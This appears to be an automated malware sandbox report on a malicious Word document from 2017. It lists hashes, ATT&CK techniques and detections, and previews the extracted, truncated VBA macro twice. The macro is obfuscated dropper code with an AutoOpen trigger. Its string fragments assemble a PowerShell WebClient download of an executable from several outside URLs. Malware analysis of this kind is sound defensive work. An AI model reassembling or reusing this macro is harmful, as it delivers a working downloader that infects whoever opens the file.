Office (OLE) malware analysis — malicious · 4a5af8308ee192a6

MALICIOUS

Office (OLE)

174.5 KB Created: 2017-12-08 05:37:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: 8791a31133c26b7e578ddc98f870e3f5 SHA-1: b90143cab8890fffe94078fdc148c16435ceef90 SHA-256: 4a5af8308ee192a68eb535e2abc467c2c70cd84291f6a72598604f7eb3cf45d2

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file is identified as malicious by ClamAV and contains a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, a common technique for executing arbitrary commands, indicating an attempt to download and execute a secondary payload. The presence of the 'Img.Dropper.PhishingLure-6443153-0' signature further supports its malicious nature.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 67734 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	67734 bytes
SHA-256: `5ecf1fc155d9139863703ece43c96b5ecc09240f95bfee34eb99e332308dcaaa`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "MoCcfYLiXIJ" Function CiSqtWs() mvzKX = Array(UCase("OKRENzMtCm" + "qShTNrV" + "MWEBYncH" + "EMzHCansGrWRb" + "ROiZTiov"), UCase("YVoAJJsRk" + "XoqmznrubGzwt" + "KnnuNIYAJtbm" + "ZdjOamZEX" + "bhmbnNpTZcD")) XsDHwGmf = Mid("PRjfotUHj4mVzjh6+'+wU6nv:pubwU6+wU6lwU6+wU6ic wU6+wUY9R+Y9R6+ EcmwU6+wU6X02wU6+wU6Ecm + wU6+wU6eaUkarY9R+Y9Raw'+'U6Y9R+Y'+'9R+wU6pas + Ecm.Y9R+Y9RexewU6+wU6EcmwU6+wU6N7Do0doFQlLDRPIRU6A8", 17, 150) wTQRXNRja = Array(UCase("KUrvnOuVqwOYoi" + "QQzpShlMQYdHV" + "wFwoQzELozMtf" + "JCAjtwwIBAn"), UCase("ZHbXJHZf" + "tQjXlnEbAcYBI" + "OYzNWso" + "wBDYwjR" + "FUAjPlQIIKtjB")) bicOzjwKD = Array(UCase("VWwEbTWfzLLZS" + "rrZMThmML" + "bhlnTaBJL" + "HMQWKGhsdQVM"), UCase("WVztNJWD" + "KlcuiiLX" + "BOjJfbDB" + "zujvrOXOS" + "joAofwBftP")) CWpPBZizTET = Array(UCase("bzOZLCwwabLOj" + "ktzRsVSpRW" + "zjUCYkYSI" + "VaRmqwJGJiwwZB" + "YvJiXljrKL"), UCase("duCrnwYWOS" + "iCXIiHsSBHTd" + "oOjkMpiGbVUPES" + "AZDmGqRHLPDZz" + "KOKRCCYMoJZka")) aKBEGn = Mid("WfFM6moCHAR]92)vgY9R+Y9RVIeXY9R)-cRE'+'PLaCe Y9RvgVY9R,[CHar]124 -rePLACE Y9RwU6Y9R,[CHar]39) )') -REplTqIFUicKGOiHk6h", 8, 99) WRsWihmq = Array(UCase("wjGHUwaNqW" + "LvWJZPtOWUQqq" + "BZDKdwKmpA" + "coXPzAbzr"), UCase("ESWYmlfsDiq" + "lSZWCNZfZ" + "VvwaWwY" + "oqwtwGhlq" + "ftlSXMCE")) wSIUKIBzQiI = Array(UCase("jCtdoAR" + "DjWJXHXVIPi" + "QGKwCPSol" + "NWPNaJWZkzbjK"), UCase("usfRpTBJBMm" + "subZhdpKTAu" + "jNzifjmh" + "jDJkBwSrDUCaAR" + "wKRwtzJuwVl")) nQMBouAJoC = Array(UCase("NvnDmsXzoJ" + "IRQzRMpCzGNZ" + "YZXLSZl" + "FOHXbYGKFME" + "JIlaDYEMYwNzW"), UCase("fMVLiOXFCDJc" + "nisruJhuQowHu" + "YCJBHBrttp" + "ipTDFiQbiRijFS" + "opPYZEjtzCtCC")) LzFOwTO = Mid("0Hk. ( $pShoMe[21]+$PSHoME[34]+'X')( (('. ( s4oEnv:COmSPe'+'c[4,26,25]-JOinY9RY9R)(((Y9R((wU6ea'+'UwU6+wU6franc = new-objewU6+wU6ct SystwU6+wU6ewU6+wU6m.NewUY9R+Y9R6+wU6twU6+wU6.MnwSGkHtDSZpS8rpEZQ9GKFk4BMwi", 4, 175) qTRQFH = Array(UCase("USdRZFdLrRp" + "iXSQfrjfwXjV" + "onwWIKOPX" + "ZZCcUWFkhUkUVh"), UCase("PHlFiwjIzlRhoi" + "aQGatqc" + "OIqnCAhUS" + "ctDdKsBqR" + "rDpQBbu")) MlcELakVT = Array(UCase("wtoCzLTNqKF" + "fMDuWDiQMBi" + "QpwwUAMjOA" + "XpdHHXbwETtY"), UCase("qEjpTmOwOT" + "INXsqwZRfcfF" + "wbtkDZCWQaFQT" + "MclnIVqztA" + "IGtctuKzntst")) EYoYKmz = Array(UCase("EnAMvvjnhOMlkJ" + "kqfoijOw" + "QJuTkWFzFjXA" + "zAOHoZJNUQm" + "YsAIOOprTw"), UCase("AMCKIPfBlHJs" + "abronTvsIvM" + "ForVhJHBONu" + "PBzpPAQOzUim" + "BDzBtsRpjC")) riRiVsaBE = Mid("5Rinc.com/F68qOaqY9R+Y9R/,htw'+'U6+'+'wU6tpY9R+Y9R://wU6+wU6tsimtwU6+wU6sum.'+'eu/3'+'GwU6+wU6rPPhY'+'/,wU6+wU6httpwU6+wU6://ewU6+wU6cgcksa.wU6+wU6cwU6+wU6om/wU6+wU611wU6+wU6QMwU6+wU6/EwU6+wjcoVB2F5wMq6Jwz0SLV2Iip5VpWSXT1udGGd", 2, 189) LQNoHZk = Array(UCase("spRQrmRcWbN" + "toWjCwhsCvSIu" + "juRjcTjHuT" + "aIGiGlf"), UCase("nzGoPkwLAbzW" + "VUGWKqzt" + "ltCiboa" + "vJncHXZG" + "vfIifwz")) XPwMHnf = Array(UCase("njEzCrQMhFZ" + "VFdHiwikGFwj" + "HAUVczj" + "XBjwTLIDVFRbRi"), UCase("QknrBRUihXrvrw" + "EHqnwEtKKmVjl" + "hEocEEkpGhhDSB" + "cQRHdBJlif" + "WacEfkijASCSm")) HPTCUmAPWFh = Array(UCase("LHEJRIblhf" + "iEQYYzVEKc" + "VYDFNNdK" + "iBZNziSowww" + "qqawYjPKfzf"), UCase("DmjFLvOIWEpjfD" + "ufhHMiiiid" + "pdNzvlWc" + "MzMcBjpD" + "AuSUJVfwqTSU")) LSFvv = Mid("iNZCDNmorzGteawU6+wU6UbcdwU6+wU6 wU6+wU6Wh55Rlho5OkVh7u0", 13, 28) UbdrSIAuvS = Array(UCase("HPBIGvlrlhWEZ" + "wXTKzNhK" + "BCwUjBGa" + "iPWmHcXkFfovia"), UCase("bkczrVZK" + "CAGJbCqfHZaJkL" + "rmMICVRTb" + "swZGibFFZjHW" + "JCoInIACq")) PjiRLsZHbp = Array(UCase("wcDFkuWJ" + "KCsNwSE" + "coishjo" + "TsUzvCKpDz"), UCase("ZvwvjcwjQbwY" + "tjqdpQRt" + "lRBCMJHsD" + "zifKdszP" + "zYsXTHDLMjAn")) IOcSIazbIbD = Array(UCase("adsiVRpcl" + "bfwrrqHwnLZfAb" + "KaWzKHKzuUYqd" + "TBjFuWphz" + "WcKzYuv"), UCase("QrLrTdbnRfE" + "SzdhTKsaGF" + "daQdhwNbAZvamF" + "hCiGFKccmWz" + "dOBUWKtiQCA")) ... (truncated)

SHA-256: 5ecf1fc155d9139863703ece43c96b5ecc09240f95bfee34eb99e332308dcaaa

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MoCcfYLiXIJ"
Function CiSqtWs()
mvzKX = Array(UCase("OKRENzMtCm" + "qShTNrV" + "MWEBYncH" + "EMzHCansGrWRb" + "ROiZTiov"), UCase("YVoAJJsRk" + "XoqmznrubGzwt" + "KnnuNIYAJtbm" + "ZdjOamZEX" + "bhmbnNpTZcD"))
XsDHwGmf = Mid("PRjfotUHj4mVzjh6+'+wU6nv:pubwU6+wU6lwU6+wU6ic wU6+wUY9R+Y9R6+ EcmwU6+wU6X02wU6+wU6Ecm + wU6+wU6eaUkarY9R+Y9Raw'+'U6Y9R+Y'+'9R+wU6pas + Ecm.Y9R+Y9RexewU6+wU6EcmwU6+wU6N7Do0doFQlLDRPIRU6A8", 17, 150)
wTQRXNRja = Array(UCase("KUrvnOuVqwOYoi" + "QQzpShlMQYdHV" + "wFwoQzELozMtf" + "JCAjtwwIBAn"), UCase("ZHbXJHZf" + "tQjXlnEbAcYBI" + "OYzNWso" + "wBDYwjR" + "FUAjPlQIIKtjB"))
bicOzjwKD = Array(UCase("VWwEbTWfzLLZS" + "rrZMThmML" + "bhlnTaBJL" + "HMQWKGhsdQVM"), UCase("WVztNJWD" + "KlcuiiLX" + "BOjJfbDB" + "zujvrOXOS" + "joAofwBftP"))
CWpPBZizTET = Array(UCase("bzOZLCwwabLOj" + "ktzRsVSpRW" + "zjUCYkYSI" + "VaRmqwJGJiwwZB" + "YvJiXljrKL"), UCase("duCrnwYWOS" + "iCXIiHsSBHTd" + "oOjkMpiGbVUPES" + "AZDmGqRHLPDZz" + "KOKRCCYMoJZka"))
aKBEGn = Mid("WfFM6moCHAR]92)vgY9R+Y9RVIeXY9R)-cRE'+'PLaCe  Y9RvgVY9R,[CHar]124  -rePLACE  Y9RwU6Y9R,[CHar]39) )') -REplTqIFUicKGOiHk6h", 8, 99)
WRsWihmq = Array(UCase("wjGHUwaNqW" + "LvWJZPtOWUQqq" + "BZDKdwKmpA" + "coXPzAbzr"), UCase("ESWYmlfsDiq" + "lSZWCNZfZ" + "VvwaWwY" + "oqwtwGhlq" + "ftlSXMCE"))
wSIUKIBzQiI = Array(UCase("jCtdoAR" + "DjWJXHXVIPi" + "QGKwCPSol" + "NWPNaJWZkzbjK"), UCase("usfRpTBJBMm" + "subZhdpKTAu" + "jNzifjmh" + "jDJkBwSrDUCaAR" + "wKRwtzJuwVl"))
nQMBouAJoC = Array(UCase("NvnDmsXzoJ" + "IRQzRMpCzGNZ" + "YZXLSZl" + "FOHXbYGKFME" + "JIlaDYEMYwNzW"), UCase("fMVLiOXFCDJc" + "nisruJhuQowHu" + "YCJBHBrttp" + "ipTDFiQbiRijFS" + "opPYZEjtzCtCC"))
LzFOwTO = Mid("0Hk. ( $pShoMe[21]+$PSHoME[34]+'X')( (('. ( s4oEnv:COmSPe'+'c[4,26,25]-JOinY9RY9R)(((Y9R((wU6ea'+'UwU6+wU6franc = new-objewU6+wU6ct SystwU6+wU6ewU6+wU6m.NewUY9R+Y9R6+wU6twU6+wU6.MnwSGkHtDSZpS8rpEZQ9GKFk4BMwi", 4, 175)
qTRQFH = Array(UCase("USdRZFdLrRp" + "iXSQfrjfwXjV" + "onwWIKOPX" + "ZZCcUWFkhUkUVh"), UCase("PHlFiwjIzlRhoi" + "aQGatqc" + "OIqnCAhUS" + "ctDdKsBqR" + "rDpQBbu"))
MlcELakVT = Array(UCase("wtoCzLTNqKF" + "fMDuWDiQMBi" + "QpwwUAMjOA" + "XpdHHXbwETtY"), UCase("qEjpTmOwOT" + "INXsqwZRfcfF" + "wbtkDZCWQaFQT" + "MclnIVqztA" + "IGtctuKzntst"))
EYoYKmz = Array(UCase("EnAMvvjnhOMlkJ" + "kqfoijOw" + "QJuTkWFzFjXA" + "zAOHoZJNUQm" + "YsAIOOprTw"), UCase("AMCKIPfBlHJs" + "abronTvsIvM" + "ForVhJHBONu" + "PBzpPAQOzUim" + "BDzBtsRpjC"))
riRiVsaBE = Mid("5Rinc.com/F68qOaqY9R+Y9R/,htw'+'U6+'+'wU6tpY9R+Y9R://wU6+wU6tsimtwU6+wU6sum.'+'eu/3'+'GwU6+wU6rPPhY'+'/,wU6+wU6httpwU6+wU6://ewU6+wU6cgcksa.wU6+wU6cwU6+wU6om/wU6+wU611wU6+wU6QMwU6+wU6/EwU6+wjcoVB2F5wMq6Jwz0SLV2Iip5VpWSXT1udGGd", 2, 189)
LQNoHZk = Array(UCase("spRQrmRcWbN" + "toWjCwhsCvSIu" + "juRjcTjHuT" + "aIGiGlf"), UCase("nzGoPkwLAbzW" + "VUGWKqzt" + "ltCiboa" + "vJncHXZG" + "vfIifwz"))
XPwMHnf = Array(UCase("njEzCrQMhFZ" + "VFdHiwikGFwj" + "HAUVczj" + "XBjwTLIDVFRbRi"), UCase("QknrBRUihXrvrw" + "EHqnwEtKKmVjl" + "hEocEEkpGhhDSB" + "cQRHdBJlif" + "WacEfkijASCSm"))
HPTCUmAPWFh = Array(UCase("LHEJRIblhf" + "iEQYYzVEKc" + "VYDFNNdK" + "iBZNziSowww" + "qqawYjPKfzf"), UCase("DmjFLvOIWEpjfD" + "ufhHMiiiid" + "pdNzvlWc" + "MzMcBjpD" + "AuSUJVfwqTSU"))
LSFvv = Mid("iNZCDNmorzGteawU6+wU6UbcdwU6+wU6 wU6+wU6Wh55Rlho5OkVh7u0", 13, 28)
UbdrSIAuvS = Array(UCase("HPBIGvlrlhWEZ" + "wXTKzNhK" + "BCwUjBGa" + "iPWmHcXkFfovia"), UCase("bkczrVZK" + "CAGJbCqfHZaJkL" + "rmMICVRTb" + "swZGibFFZjHW" + "JCoInIACq"))
PjiRLsZHbp = Array(UCase("wcDFkuWJ" + "KCsNwSE" + "coishjo" + "TsUzvCKpDz"), UCase("ZvwvjcwjQbwY" + "tjqdpQRt" + "lRBCMJHsD" + "zifKdszP" + "zYsXTHDLMjAn"))
IOcSIazbIbD = Array(UCase("adsiVRpcl" + "bfwrrqHwnLZfAb" + "KaWzKHKzuUYqd" + "TBjFuWphz" + "WcKzYuv"), UCase("QrLrTdbnRfE" + "SzdhTKsaGF" + "daQdhwNbAZvamF" + "hCiGFKccmWz" + "dOBUWKtiQCA"))

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.